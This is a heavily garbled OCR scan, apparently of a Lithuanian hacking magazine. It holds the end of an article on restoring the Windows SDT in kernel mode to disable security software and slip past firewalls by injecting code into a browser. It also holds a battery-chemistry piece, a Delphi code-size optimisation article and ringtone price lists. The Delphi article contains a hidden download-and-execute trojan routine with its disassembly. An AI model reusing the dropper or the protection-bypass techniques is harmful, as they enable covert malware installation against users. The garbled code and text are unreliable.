pSenvice= + ,dyServiues + +) 
TABLE[dwServices] — "pSanviee - poli 
NENTABLE — (DWORD)(dykernelBaso 


Imogešast 
duKSOI); 


(wkernelBose; 


Dabar, pereinant į kernel mode, galima arba atstatyti SDT, tie- 
siog pakeičiant visus einamos lentelės adresus į ką tik gautus, 
taip apeinant visas apsaugas, arba tuos pačius adresus panau- 
doti tiesiogiai, siekiant apeiti perėmimą. Apėjimo atžvilgiu NtWri- 
teVirtualmemory atstatyti lengviau, o tiesiogiai naudotis adre- 
sais ramiau. Tiesiogiai reiškia paleisti funkciją gautu adresu 
tiesiog iš ring. 

Kitaip tariant, atjunkime visas apsaugas. 

Atstatome SDT branduolio lygyje 


void InkernePrac() 


fu (ti = Ų 
(DWoRO) 


< dySenicas; i 


(OWORO*)(NEWTABLE))JŲŲ = TABLĖ; 


Paleisk šią funkciją branduolio lygyje. Nori 
šyklę ir taip apeik ugniasienę 


— įterpk kodą į nar- 
niekas tau nieko nesakys. Žo- 


džiu, visos apsaugos miega. Neblogai, tiesa? Ir tai dar toli gražu 
ne visi antihukingo panaudojimai branduolio lygyje. Su juo gali- 
ma kovoti prieš kietus branduolinius rootkitus. Galima atjungti 
kokius nors gudrius antiderinimo metodus. Žodžiu, čia be bana- 
laus apsaugų atjungimo galima rasti ir kitų panaudojimo sričių. 
Tuo baigiu savo pasakojimą. Jeigu iškils kokių nors klausimų — 
rašyk, pasistengsiu viska paaiškinti. Sėkmingo kompiliavimo. 


Ugniasienės apėjimas 9 Kb kodo reikalas: 


Kuo skiriasi NiCd-, NiMH- ir Li-Ion akumulia- 

ti Daugelyje šiuolaikinių įrenginių su- 

montuoti Li-Ion akumai, tačiau aš nesenai 

nusipirkau fotoaparatą, kuris veikia su NiMH 
baterijomis, kurios draugų teigimu yra praėjusio 
amžiaus reliktas. Taigi susidomėjau. 


Nikelio-kadmio (NiCd) baterija buvo sukurta dar 
tolimais 1946 metais ir iki pat 90 ųjų buvo pačiu 


NJ 


populiariausiu akumuliatorių tipu. Nikelis buvo 

naudojamas teigiamam elektrodui, o Kadmis 
neigiamam. Vietoje elektrolito buvo naudojamas kalio 
hidroksidas. Kadmis nuodingas, jo utilizacija labai bran- 
Ei, todėl vėliau NiCd akumuliatoriai buvo uždrausti dau- 
gelyje pasaulio šalių. Tiesa, tokio tipo baterijų charakte- 
ristikos iš tiesų įspūdingos: greitas pakrovimo laikas, ga- 
limybė dirbti net labai žemose temperatūrose, ilgas sau- 
gojimo laikas be galios praradimo ir milžiniškas pakar- 
totino užkrovimo ciklų skaičius — iki 1500. Tokio aku- 
muliatoriaus trūkumas yra taip vadinamas atminties 
efektas, kuris žymiai sumažina maksimaliai galimą ener- 
gijos atsargą ir pasireiškia tuo atveju, kuomet pakartoti- 
nai kraunamas nepilnai išsikrovęs akumuliatorius. 
Nikelio-metalohidridiniai (NiMH) akumuliatoriai pa- 
keitė uždraustuosius NiCd. Vietoje ypač toksiško kad- 
mio pradėtas naudoti metalo ir vandenilio junginys. 
Tai pavyko visai neblogai: energijos sukaupimo tankis 
pradėjo siekti 120 W/kg, kai nikelio-kadmio akumu- 
liatoriuose šis rodiklis siekė daugiausiai 80 W/kg. Tie- 
sa, čia taip pat neapsieita be trūkumų: įkrovimo-išk- 
rovimo ciklų skaičius sumažėjo iki 500, o darbinė tem- 
peratūra nuo -40 pakilo iki -20 laipsnių Celsijaus. 
Dabar labiausiai paplitę ličio-jonų akumuliatoriai (Li 
Jon). Jie naudojami visur: šiuolaikiniuose mobiliojo ry- 
šio telefonuose, kišeniniuose, nešiojamuosiuose kom- 
piuteriuose ir t.t. Tokios baterijos neturi atminties efek- 
to, todėl jas galima krauti kada tik panorėjus. |krovi- 
mų skaičius gali siekti 1000-1200 kartų. Beje. Li 
Jon įkrovimo tankis siekia 160 W/kg, o vidinių ener- 
getinių nuostolių laipsnis — viso labo 1076 talpos per 
mėnesį. Tiesa, yra vienas „bet“: ličio jonų akumulia- 
toriai sensta, t.y. kasmet jų maksimalus krūvis darosi 
vis mažesnis ir mažesnis. Čia jau nieko nepadarysi, 
todėl reikia būti pasiruošusiam po 2-3 metų skirti 
lėšų naujam akumuliatoriui pirkti. 
Taip pat egzistuoja švino-rūgštiniai (Lead Acid) ir II- 
šio-polimerų (Li-Pol) akumuliatoriai. Pirmieji naudo- 
jami nepertraukiamo maitinimo šaltiniuose, o antrie- 
Ji — geriausiuose mobiliojo ryšio telefonų modeliuo- 
se. Tiek vieni, tiek ir kiti kol kas nėra labai paplitę. 
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„Delphi“ visagalis 

TU PROGRAMUOJI SU DELPHI IR JAUTIESI 
KITOKS, NEI VISI KITI? TU PRITRŪKSTI AR- 
GUMENTŲ DISKUTUODAMAS BEGALINIUO- 
SE HOLYWAR'UOSE? DABAR TIKRAI ŽINO- 
SI: DELPHI VERTA TO, KAD JĄ MYLETUM. IR 
NE TIK DEL SIOS KALBOS PAPRASTUMO. 
LABAI MAZOS IR LABAI GREITOS SU DEL P- 
HI SUKURTOS PROGRAMOS — TAI ĮMANO- 
MA! TU GALĖSI APIE TAI PAPASAKOTI VI- 
SIEMS ABEJOJANTIEMS. IR PAGALIAU IS- 
SKLAIDYSI GANDUS, NEVA DELPHI SKIRTA 
LAMERIAMS! 


Išspaudžiam iš „Delphi“ viską, kas įmanoma 
Daugelis sisteminių programuotojų įprato laikyti Delphi 
nieko verta. Savo nuomone jie grindžia tuo, kad kompiliai 
generuoja per daug lėtą ir didelį kodą, o vidutinis tuščios for 
mos su mygtuku dydis 400 kilobaitų. Beje, 
tais iš viso nėra pateikiami. Kuomet forumuose susi 
ir Delphi gerbėjų, pirmieji paprastai rėkia apie superl 
taksę ir nepaprastas OOP galimybes, tuo pačiu tvirti 
sisteminiame programavime visa tai yra reikalinga, 0 anti 
apie to paties Delphi O0P galimybes, kurių nėra C++, ir apie 
tai, kad su šia kalba programuoti paprasčiau, Sprendžiant ti 
pagal vienų, tiek pagal kitų žodžius, galima teigti, kad abi p 
nei apie Delphi, nei apie C+ + iš tikrųjų nežino, o visi šie plepa- 
lai — paprasčiausias lamerių malimas liežuviu 

Šis straipsnis skirtas pademonstruoti sisteminio programavimo 
su Delphi metodus. Jis parašytas tiems, kas mėgsta šia kalba, 
nori pasiekti maksimalų kodo efektyvumą ir nebijo kaip reikiant 
pasidarbuoti. Aš parodysiu, kaip su Delphi padaryti tai, ką dau- 
gelis laiko neįmanomu. Užsiiminėjantiems programavimu su 
C++ nėra sunku surasti ištisą krūvą straipsnių apie optimizaci 
ją. Jeigu tu programuoji su Delphi, tai šiuo klausimu tu nerasi 
nieko gero. Veikiausiai visi mano, kad jokios optimizacijos čia 
nereikia. Galbūt tave tenkina 400 kilobaitų užimanti tuščia for 
ma su mygtuku? O gal manai, i tai neišvengiamas blogis, ir 
jau senai su tuo susitaikei? Ką gj, teks šiek tiek pakutenti tavo 
nervus ir išsklaidyti klaidingus įsit A 


siškai 


ius 


IŠiek tiek apie kompiliatoriaus generuojamą kodą] Iš pra- 
džių patikrinsim teiginį, kad Delphi kompiliatorius generuoja daug 
papildomo ir neefektyvaus kodo. Tam parašysime funkciją, kuri 
parsisiunčia bylą iš interneto ir ja paleidžia (tokie dalykai pa: 
prastai naudojami trojan 
muosime panaudodami API. 


vaime suprantama 
ai kas man iš to išėjo: 


rogra: 


praceduro DowiloadAndExecute(Soure: PChai); sia) 
cons! 
DeslFile — 'cAhojanexe“ 


begin 
UrlDownloadTofileni, Source, Destile, , ni) 
Wintsec(Destile, SW HIDE) 

end; 


Šį tekstą aš įterpiau į programą, ją sukompiliavau ir disas 
bliavau su IDA. Štai pakomentuotas listingas: 


DownloadAndxecute proc near 
Source = dword pl B 

pustebp 

mov eb, esp 

puskO ; LPBINDSTATUSCALLBACK 
pushO ; DWORD 
pustulhsei DesFile 
mov eax, [ebp + So 


pushioax 
pushO ; LPUNKN MN 
all URLDownloadToFileA 
pushO ; uCmdShow 


pushofiset DestFile  ; IpCmdline: 
call WinExec 
pop ebp 
"in 4 
DownloadAndExecute endp. 
Destfile db “cAtrojanase',0 


Na, ir kur gi ta papildomo bei nereikalingo kodo krūva, apie 
kurią kai kurie taip mėgsta šnekėti? Viskas paprasta ir gražu, 
beveik tą pati galima parašyti rankiniu būdu su asembleriu. 
Kodėl su Delphi parašytos programos tokios didelės? Iš kur at- 
keliauja tas papildomas kodas, jeigu kompiliatorius jo negene- 
ruoja? Tuojau mes šį klausima panagrinėsime detaliau. 


[00P — progreso variklis] 00P - šiuo metu ganėtinai ma- 
dinga programavimo kryptis. Jos tikslas - supaprastinti progra- 
mų rašymą ir sutrumpinti jų kūrimo laiką, su kuo OOP puikiai 
susidoroja. Daugelis taikomųjų programų kūrėjų, kurie tai daro 
su C++ arba Delphi, be OOP jau nė neįsivaizduoja savo darbo. 
Pagrindinis Jų principas — greičiau pridavei programą, greičiau 
gavai pinigus. Tokiomis sąlygomis kokia nors optimizacija tie- 
siog pamirštama. 

Tačiau jeigu mes į visą šį reikalą pažiūrėtume sisteminio pro- 
gramuotojo akimis, tai iš karto pamatytume akivaizdų pagrindi- 
ni trūkumą: O0P — generuojamo kodo kokybė. Tarkim, mes 
turime klasę, kuri paveldėjama iš kitos klasės. Kuriant šios kla- 
sės objektą, kompiliatorius bus priverstas tokią klasę pilnai įtrauk- 
ti į programos sudėti, ką turės padaryti ir su klase-tėvu, kadan- 
gi nėra galimybės nustatyti, kokie klasių metodai nebus naudo- 
jami. Jeigu pas mus yra ištisas paveldimų klasių medis, kaip 
paprastai ir būna realiose programose, tai visas šis kodas bus 
įjungtas į programą, ir nuo to niekur nepabėgsi. Klasės metodai 
iškviečiami per lentelę, kas padidina iškvietimo laiką. O kai me- 
todas paveldimas iš tėvo dešimtoje kartoje, tai ir iškvietimas 
turės pereiti per dešimtį lentelių, kol galų gale pasieks jį apdo- 
rojantį kodą. Taip išeina, kad kartu su krūva mirusio kodo mes 
dar gauname žema veikimo efektyvumą. Visa tai labai gerai 
matosi remiantis Delphi VCL bibliotekos pavyzdžiu. 

Tuo tarpu MFC panaudojanti programa, parašyta su VB arba su 
VC, kažkodėl užima kur kas mažiau vietos. Taip yra todėl, kad 
didžioji ir siaubingoji kompanija „Microsoft“ prie to prikišo savo 
letenas. MFC ir runtime bibliotekos Visual Basic'e užima nė 


= - 22 
r“ = C———— LTE 


4 Br AR Lasko da 5 


klek nemažiau, tiesiog jos sukompiliuotos į DLL ir pateikiamos 
kartu su Windows sistema, o tai reiškia, kad jų kodo nereikia 
tąsytis programose su savimi. „Borland“ naudai galima pasaky- 
ti, kad tokia galimybe yra ir Delphi'je. Tiesiog projekto nustaty- 
muose reikia uždėti varnelę Build with runtime packages. po ko 
programa žymiai sumažės, tačiau jai reikės atitinkamų runtime 
bibliotekų, Savaime suprantama, šios bibliotekos nėra patei- 
kiamos kartu su Windows, tačiau dėl to reikia kaltinti ne „Bot- 
land“, 0 monopolistinę „Microsoft“ politiką. 

00P mėgėjai, norintys kurti savo programas vizualiame režime, 
gali naudoti KOL. Tai bandymas padaryti kažką panašaus į VCL, 
tačiau įvertinant ir jo trūkumus. Vidutinis tuščios formos su myg- 
tuku dydis — 35 Kb, kas jau geriau, bet rimtoms programoms 
ši biblioteka netinka, kadangi veikia klaidingai. Ir šiaip, tai tik 
pusėtinas sprendima: 
Tie, kas nori pasiekti iš tiesų didelio kodo efektyvumo, turi eiti 
visai kitu keliu: pagaliau visiems laikams pamiršti OOP ir viską, 
kas su tuo susiję. Programas rašyti teks tik su grynu API. 


[Antrasis kaltininkas] Su Delphi sukursime tuščią projektą, 
kuris neturi jokio naudingo kodo: 


program Somplė; 
begin 
end. 


Po sukompiliavimo su Delphi 7 mes gauname 13,5 Kb dydžio 
exe byla. Iš kur?! Juk programoje nieko nėra! Atsakyti į šį klau- 
simą ir vėl padės IDA. Disasembliuojame exe'ką ir žiūrime, kas 
jame yra. lėjimo į programa taškas atrodys štai taip: 


public stot 
stūri: 
push ehp 
mov obp, 25p 
add esp, OFFFFFFFOh 
mov eax, ofise! Moduleld 
all Inilbxe 
; Čia galėtų būti mūsu kodas. 
tall Handlefinaly 
CODE ends 


Visas papildomas kodas yra funkcijose InitExe ir HandleFi- 
nally. Esmė tame, kad kiekvienoje Delphi programoje neaki- 
vaizdžiai įjungiamas kodas, įeinantis į RTL (Run Time Library) 
sudėtį. Ši biblioteka reikalinga tokioms kalbos galimybėms 
palaikyti, kaip OOP, darbas su eilutėmis (string) ir specifi- 
nėms Pascal'io funkcijoms (AssignFile, ReadLn, WriteLn, etc.). 
InitExe atlieka viso šio gėrio inicializaciją, o HandleFinally už- 
tikrina korektišką resursų atlaisvinimą. Vėlgi, visa tai padary- 
ta norint palengvinti programuotojų gyvenimą. Paties RTL pa- 
naudojimas kartais pasiteisina, dėl Ko kodo efektyvumas gali 
ne sumažėti, o kaip tik padidėti. Pavyzdžiui, | RTL sudėtį įei- 
na hesp valdymas, kuris leidžia greitai išskirti ir atlaisvinti 
mažus atminties blokus. Savo efektyvumu Jis tris kartus |en- 
kia sisteminius. Generuojamo kodo atžvilgiu darbas su eilu- 
tėmis RTL'e taip pat realizuotas pakankamai neblogai, tiesa, 
dėl to padidėja bylos apimtis, todėl RTL -— antrasis didelės 
apimties kaltininkas po O0P. 
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[Mažiname dydį] Jeigu tavęs netenkina minimalus 13,6 Kb 
dydis, tuomet šalinsime Delphi RTL. Visas bibliotekos kodas 
yra dviejose bylose: System.pas ir Sys!nit.pas. Deja, kompi- 
liatorius jas prie programos prijungia bet kokiu atveju, todėl 
vienintelis dalykas, kurį galima padaryti — iš šių modulių pa- 
šalinti visą kodą, be kurio programa galės veikti, tada modu- 
lius perkompiliuoti, o gautas DCU bylas galima sudėti į pro- 
gramos katalogą. 

Byloje System.pas yra pagrindinis RTL ir klasių palaikymo ko- 
das, tačiau mes visa tai mesim lauk. Minimalus šios bylos turi- 
nys galėtų būti toks: 


vii System 
inete 
grocedurė  Uondefiuoll; 


Hype 
TGUID = record 
Dl: langVord; 
02: Word; 
03: Word: 
D: anay [0.2] of Byte; 
snd; 


PinitContext = “ Tlnirčontext; 
TiniCortext = recoid 


OuterČoniost: PlnitContest; 
Eschrame: Pointer; 
Inirlable: pointer; 
InirCount: Inieger; 
Module: painiet: 
DUScveEBP: Painter; 
DilSaveEBX: Pointer; 
DLSoveES!: Painter; 
DlSoveED): Pointer; 
EaiPiocessTLS: procedure; 
DlltnitState: Byte; 

end; 


implementation 


poceduie - Kondlefinoli; 
0 m 
and; 


end. 


Kompilatorius bet kokiu atveju reikalauja aprašytos TGUID struk- 
tūros, o be jos iš viso atsisako kompiliuoti modulį. TinitContext 
prireiks linkeriui, jeigu mes kursime DLL. HandieFinaliy — RTL 
resursų atlaisvinimo procedūra, kompiliatoriui ji taip pat būtina, 
nors ir gali būti tuščia. Dabar sumažinsime bylą Sysinit.pas, 
kurioje yra inicializacijos bei RTL darbo užbaigimo kodas ir kuris 
valdo oaketų palaikymą. Mums pakaks štai ko: 


vait Syslnit; 


interface 

procedure InitEie; 

procedure holtū; 

procedure „Initlib(Context: PlaitContex); 


“0 
Moduisislib: Boolean; 
Tislades: Integer = -1; 
Tiklast: Byte; 


const 
PirioNil: Pointer = nil; 


implementation 


procedure | Initlib(Context: PlnitCentest); 
asm 
end; 


groceduie | išboo; 
asm 
nd; 


procedure | haliO; 
um 
and; 


end. 


InitExe — RTL inicializacijos exe byloms procedūra, InitLib — 
skirta DLL'ams, haltO — programos darbo užbaigimas. Visų Ii- 
kusių papildomų struktūrų ir kintamųjų, kuriuos teko palikti, rei- 
kia kompiliatoriui. Visi šie dalykėliai nebus įjungiami į galutinę 
bylą ir neturės jokios įtakos jos dydžiui. 

Dabar šias dvi bylas padėsime i katalogą su projektu ir jas su- 
kompiliuosime komandinėje eilutėje: 


dcc32.exe —O syslem. pas sysinil.pas JA V -Z -$0- 0 


Atsikratę RTL, mes gavome 3,5 Kb dydžio exe bylą. „Borland“ 
linkeris vykdomoje byloje sukuria šešias sekcijas, jos išlygina- 
mos po 512 baitus, prie jų prisideda PE antraštė, iš kur ir atsi- 
randa šie 3,5 kilobaitai. 

Tiesa, be mažo dydžio kaip priedą mes gauname ir tam tikrų 
problemų, kadangi dabar negalėsime pasinaudot WinAP! ant- 
raščių bylomis, kurios pateikiamos kartu su Delphi. Vietoje jų 
teks rašyti savas. Tai nėra sunku, kadangi naudojamų API apra- 
šymus galima pasiimti iš paties „Borland“ antraščių bylų ir pri- 
reikus perkelti pas save. 

Jeigu projekte yra keletas PAS bylų, linkeris kodo išlyginimui įterps 
papildomas tuščias sritis, todėl apimtis vėl padidės. Norint to 
išvengti, reikia visą programą, įskaitant ir API apibrėžimus, su- 
dėti į vieną bylą. Tai nėra labai patogu, todėl geriau pasinaudoti 
preprocesoriaus direktyva $INCLUDE ir išskaidyti kodą į kelias 
inc bylas. Čia galima susidurti su dar viena problema — pasi- 
kartojančiu kodu (kuomet kelios /nc bylos prijungia vieną ir tą 
pačią inc bylą), tuomet kompiliatorius atsisako kompiliuoti. Sioje 
situacijoje išeitį galima rasti pasinaudojus sąlyginio kompiliavi- 
mo direktyvomis, po ko bet kuri inc byla bus tokio pavidalo: 


(Silndei win32api) 
(Sdefine win32api | 

čia eina mūsų kodus: 
(Sendif| 


Taip galima be RTL rašyti ganėtinai sudėtingas programas ir pa- 
miršti nepatogumus. 


[Galima dar mažiau!] Tikriausiai minimalus exe bylos 3,5 Kb 
dydis įtiks toli gražu ne visiems. Ką gi, pasistengus galima visa 
tai suspausti dar kelis kartus. Tuomet reikia atsisakyti patogaus 
darbo su „Borland“ linkeriu ir vykdomas bylas kurti su „Micro- 
soft“ linkeriu. Deja, čia mūsų laukia dar viena kliūtis. „Micro- 
soft“ linkerio naudojamas pagrindinis darbinis formatas yra COFF, 
tačiau jis gali suprasti ir Intel OMF. Bet „Borland“ programuoto- 
Jai (tikriausiai tyčia) po trečios Delphi versijos pakeitė generuo- 
Jamų obj bylų formatą taip, kad dabar jos nesuderinamos su 
Intel OMF. Tai reiškia, kad dabar egzistuoja du OMF tipai: Intel 
OMF ir Borland OMF. Deja, man nepavyko rasti programos, kuri 
galėtų konvertuoti objektinės bylas iš Borland OMF formato į 
COFF arba Intel OMF. Taigi teks naudotis Delphi 3 kompiliato- 
riumi, kuris generuoja standartinę objektinę /Inte/ OMF bylą. Nau- 
dojamų API importą mums taip pat teks aprašyti rankutėmis, 
kas, beje, daroma gana neįprastai. Iš pradžių iš Visual C++ 
paimkime importo biblioteką user32.lib ir atsidarykime ją HEX 
redaktoriuje. Funkcijų pavadinimai joje pateikiami „Message- 
BoxA(016“ pavidalu, kur po (0 eina perduodamų parametrų 
dydis. Iš to išplaukia, kad funkcijas mes apibrėšime štai taip: 


function MessageBoxA(hVnd: cardinal; IpTexi, |pCaption: PChar; ulype: Cardinal): Integer; 
stdcall; external 'user32.dll" name * MessagsBoA(o)16', 


Dabar pabandykime parašyti kuo mažesnio dydžio HelloWorld 
programą. Tam mes sukursime štai tokio tipo projektą: 
unit HelloWorld; 

interface 


Procedure Start; 


implementation 
function MessagoBoxA(hWnd: cardina|; |pToxt, IpCeption: PChar; UTypo: 


UT TEKO TIE „ainiai 
UT—777777777g7repry7724777+77—1 77220 
D FEI O —— L ———-— [LTE 
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2 


Cardinal); Integer; stdcall; extemal 'user32 all" name 
* MesageBok?16'; 


Piocedure Stort; 
begin 

MeisageBoxA(0, "Hello world“, nil, 0); 
end; 


end. 


Unit modulio tipas reikalingas tam, kad kompiliatorius objekti- 
nėje byloje generuotų simbolinius apibrėžtų procedūrų pavadi- 
nimus, Mūsų atveju tai bus procedūra Start — Įėjimo į progra- 
mą taškas. Dabar projektą kompiliuojame su tokia komanda: 


dcc32.8xe IP -SA-,8-,C-,D-,6-H- 11, M 04, P 0 RT UV 
M+,X= „HelloWorld.pas 


Gautą naują bylą HelloWorld.obj atsidarome su HEX redaktoriu- 
mi ir žiūrime, kuo pavirto mūsų įėjimo taškas. Pas mane gavosi 
StartSggiv. Šį pavadinimą vykdomos bylos kūrimo metu reikia 
nurodyti kaip įėjimo tašką. Ir galų gale atliekame galutinį surin- 
kimą (vykdomos bylos sukūrimą): 


Inka /ALIBN:32 /FORCEUNRESOLWEO | SUBSYSTEM:MNDOWS /ENTRVStaiššągv Halo: 
Waiclabj usz132|lb  autHallogxE 


Finale mes gauname veikiančią HelloWorld programą. kurios 
dydis — vos 832 baitai! Aš manau. kad toks dydis įtiks bet 
kam. Dabar pabandykime su IDA disasembliuoti šią bylą ir pa- 
ieškoti nereikalingo kodo: 


; Miributės: bp-based frame 
; char Texi[] 
Text db "Hallo world!",0 


public start 

start proc Neal 
push 0; Ulype 
push 0; IpCaption 
push offet Text 
push 0; bMhd 
call MessageBox 
tėln 

star! endp 


; lgtad 


Nė vieno baito nereikalingo kodo! Parodyk ši pavyzdį visiems, kas 
mėgsta šnekėti apie didelę su Delphi parašytų programų apimtų 
ir stebėk jų veido išraišką — tai labai smagu :). Labiausiai Užsi- 
Spyrę vis tiek numykia: „A... Ee... Vis tiek šūdas!“, tačiau ko nors 
rimto jau niekas nebepasakys. O užkietėję ginčų mėgėjai pateiks 
paskutinį argumentą — su Delphi negalima parašyti Windows NT 
sistemai skirtos branduolio režimo tvarkyklės (driver). Niekuo.... 
tuojau ir jie papildys pralaimėjusiujų gretas :). 


[Rašome tvarkyklę su „Delphi“] Apie tai, kaip pagal mūsų 
metodiką padaryti neimanoma — su Delphi parašyti branduo- 
lio režimo tvarkyklę, RSDN'e net yra straipsnis, todėl visiems 
susidomėjusiesiems rekomenduoju jį perskaityti. O aš savo ruož- 
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tu čia pateiksiu paprasčiausios tvarkyklės pavyzdį ir jos kompi- 
liavimui skirtos make.bat turinį. Byla Driver.pas: 


unit Driver; 

interlaco 

function DriverEntry(DriverObject, RegistryPath: pointer): integer; stdcall; 
implementation 


function DbgPrint(Str: PChar): cardinal; cdad; axterno! "ntoskml exe" 
name" DhgPrint“ 


function OriverEntry(Oriver Object, RegistryPath: pointe:): integer; 
begin 

DbyPini( Hello World!'); 

Result := 1; 
and; 


end 


Byla make bat 

dc32exe IP -SA-,B-.C-,D- 6-.H-.I-J-,L- M-.0 + ,P-,0-,R-T-,U- VW +-,X- A- Divar.pos 

link.exe /ORIVER /ALIGN:32 /BASE-0x1 0000 /SUBSYSTEH-NATIVE /FORCE-UNRESOLYED / 
ENTRY-DrivetEntryšggspvt! Driver obį ntoskm.lib /out:Driver.sys. 


Kompiliavimui mums prireiks bylos ntoskml.lib iš DDK (Driver De- 
velopment Kit). Mes gausime kilobaito dydžio tvarkyklę, kun į deri- 
nimo konsolę išveda pranešimą „Hello World“ ir grąžina klaidą, dėl 
ko nelieka atmintyje ir nereikalauja apibrėžti funkcijos DriverUnlo- 
ad. Tvarkyklei paleisti panaudok Four-F sukurtą KmdManager. Pa- 
matyti jos darbo rezultatus galima su Softlce arba DbgView. 
Pagrindinė problema, dėl kurios su Delphi negalima rašyti pil- 
naverčių tvarkyklių — nėra DDK. Norint parašyti tvarkyklę, API 
branduoliui reikia antraščių bylų ir daugybės sisteminių struktū- 
fu aprašymų. Visos šios gėrybės yra skirtos tik C (sukurta „Mic- 
rosoft“) Ir MASM32 (sukurta „Four-F“). Sklinda gandas, kad 
Jau yra sukurtas Pascal'iui skirtas DDK, tačiau autorius jį par- 
duoda už pinigus ir labai šito nereklamuoja. Manau, kad kada 
nors vis dėlio atsiras entuziastų, kurie sukurs Pascal'iui skirtą 
DDK ir pateiks jį visiems laisvam naudojimui. 

Kita problema yra tame, kad didžioji dalis su sisteminiu progra- 
mavimu susijusių pavyzdžių parašyti su C, todėl kad ir su kokia 
kalba tu rašytumei savo programas, C vis tiek teks žinoti. Be 
abejo, tai nereiškia, kad teks nuodugniai studijuoti C++. No- 
rint suprasti sisteminės programas, užteks pagrindinių sintak- 
sės žinių, nes visa kita naudojama tik taikomosiose programo- 
se, kurios mūsų visiškai nedomina. 


[Kodo perkeliamumas] Programuojant su standartiniais Delp- 
hi komponentais be krūvos trūkumų mes gauname vieną priva- 
Jumą tam tikrą kodo perkeliamumą. Jeigu programa naudo- 
Ja tik kalbos, o ne sistemos galimybes, tai ji bus lengvai kompi- 
liuojama su Kilix ir veiks Linux sistemoje. Visa problema tame, 
kad nenaudodami sistemos galimybių mes gausime tikrą klai- 
du maišą, didelę ir neefektyvią programa. Nepaisant to, rašant 
rimtas programas remiantis aukščiau išvardintomis metodiko- 
mis, vis tik norisi turėti tam tikrą nepriklausomybę nuo siste- 


mos. Ją gauti labai paprasta — pakanka parašyti kodą, kuris 
nenaudoja nei API funkcijų, nei apskritai kalbos galimybių. Kai 
kuriais atvejais tai visiškai neimanoma (pavyzdžiui. žaidimuo- 
se), tačiau kartais sistemos funkcijos absoliučiai nereikalingos 
(pavyzdžiui, matematiniuose algoritmuose). 

Bet kokiu atveju derėtų aiškiai išskirti nuo platformos (mašinos) 
priklausomas ir nepriklausomas (jeigu tokia yra! kodo dalis. Pai- 
sant aukščiau išsakytų taisyklių, nuo platformos nepriklausoma 
dalis bus išeities tekstų lygyje suderinama su bet kuria sistema, 
kuriai yra sukurtas Pascal kompiliatorius (o jis yra sukurtas net ir 
PIC valdikliams). Nepriklausomą nuo API kodą galima drasiai 
kompiliuoti į DLL ir panaudoti, pavyzdžiui, branduolio tvarkyklės 
režime. Toki DLL taip pat bus galima be problemų panaudoti ir 
kitose OS. Tam reikia tiesiog sekcija po sekcijos sumapinti DLL 
į proceso adresų erdvę, suderinti relokus ir drąsiai naudotis jos 
funkcijomis. Tai realizuojantis kodas Pascal'yje užima apie 80 
eilučių. Jeigu vis dėlto DLL naudoja tam tikras API funkcijas, tai 
jas galima suemuliuoti užpildžius DLL importo lentelę jas savo 
programoje pakeisiančių funkcijų adresais. 


[Bendri optimizavimo metodai] Stenkis visur, kur tik įmano- 
ma, naudoti rodykles. Niekada neperdavinėk duomenų į funk- 
ciją štai taip: 


procedure Paprasta (Data: TStruciure); 
Visada perdavinėk rodykles į struktūras: 


procedurė Paprosta(pDato: PStucture) ; kur PStruciurė TStructurė; 

Toks iškvietimas vyksta greičiau ir sutaupo nemažai kodo. 
Stenkis nesinaudoti string duomenų tipu, nes vietoje jo visa- 
da galima naudotis Pehar ir po to rankiniu būdu apdoroti eilu- 
tes. Jeigu eilutei saugoti reikalingas laikinas buferis. tai ji de- 
rėtų apibrėžti lokaliuose kintamuosiuose, pavyzdžiui, array of 
char. Stenkis į funkciją perdavinėti ne daugiau trijų paramet- 
rų: pirmieji trys parametrai pagal fastcall iškvietimo metodą 
(kuris Delphi'je naudojamas pagal nutylėjimą) perduodami re- 
gistruose, 0 visi tolimesni — per steką, kas sulėtina priėjimą 
prie jų ir padidina kodo apimtį. Taupyk atmintį: pavyzdžiui, jei- 
gu pas tave yra skaičių masyvas, kurių diapazonas telpa į bai- 
tą, tai nereikia jų apibrėžti kaip dword. Niekada neverta rašyti 
pasikartojančio kodo. 

Jeigu kokie nors veiksmai turi pasikartoti, tai juos reikia iškelti į 
funkciją. Nepaisant to, neverta kurti funkcijos, kurioje yra vos 
dvi kodo eilutės — jos iškvietimas gali užimti kur kas daugiau 
vietos, negu ji pati. Ir atmink svarbiausia: kodo efektyvumą visų 
pirma apibrėžia ne kompiliatorius, o panaudotas efektyvesnis 
algoritmas. 
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2it gyvi garsai 


D3410091056 Radio Show Puika 
D5410091055 Radio Show Kvepiate 

D3410091054 | Radio Show - Kaiėdių dindilin 
D5410091053 | Radio Show - Gėda klausyti 

D5410091039 | Vilkikas 

D5410091037 | Tualeto chronolegijos 

D5410091026 South park -O myy gaaddd they kil kenny 
D5410091083  Malūnsparnis 
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2Lt melodijų top 10 


1 69 DANGUJE-9 danguj 5410092107 
2 MADONNA - Hung Up 5410082101 
3. B'AVARIA - Be ribų 3410092091 
A CRAZY FROG - Asai F 5410081805 
5 BENASSI BROS -Every Single Day 5410092042 
6 SERIOGA-- Chiornyj bumer 5410091061 
7 FAKTOR2-- Kranavica S410091605 
8 VAIDAS iš "DANGAUS" - Myliu 5410052060 
9 ŽILVINAS ŽVAGULIS - Falna faina 5410091786 
10 MANGO - Lūdnos Kalėdos S410052133 


tv šou kelias į žvaigždes 


ANDRIUS - Mas vyrai 5410032010 
ANDRIUS - Nrsek sau rožės prie kasų 5410092090 
DANGĖ -Aš atėjau Ir Išeinu 5410092095 
DANGĖ -Blogom mergaitėms viskas: 5410092018 
DONATA - Paparapa 5410092084 
HAROLDAS - Ramunė balta 5410092093 
MINO 8 VILIJA = Vivo per lei 341002094 
MINO - Be meilės mirt galiu 10092134 
RAKETA--| klubą 5410092059 
RAKETA - Mūsu tai nelioči 5410091968 
RULĖ Au aunu 5410092104 
RULĖ « Pažiurėk į mane, pupito 3410082080 
SIGITA -Dar no karą 3410032105 
SIGITA - Spalvos 3410032081 
VILIJA - Kvailys 5410092085 
VILIJA = Spjaudau Ir gaudau 5410051992 
VUDIS - Du kart du. 5410032061 
VUDIS - Kur bebūitum tu 5410092106 
VUDIS - Laimingas 5410092082 


2Lt populiarios 


SUGABABES - Push The Button. 5410092063 
ARASH - Boro boro 5410051849 
50 CENT 8. OLIMIA - Candy Shop. 5410091677 
2 PAC - Ghetio Gospel S410091854 
THE RASMUS - No Fear: 5410091960 
EMINEM - Mockingbire S410051754 
WALTERS 8. KAŽA - The War Is Not Over) 5410091717 
BLACK EYED PEAS -Don'tLie 5410091940 
JUANES - La Camisa Negra 5410091964 
GORILLAZ - Dare 5410091979 
RUSLANA - Wild Dancas 5410031051 
JANES BLUNT - Your Besutitui 5410091876 
DEPECHE MODE - Precious 5410091978 
SMAKIRA La Tortura 3410091887 
EMINEM - The Way | Am 5410091941 
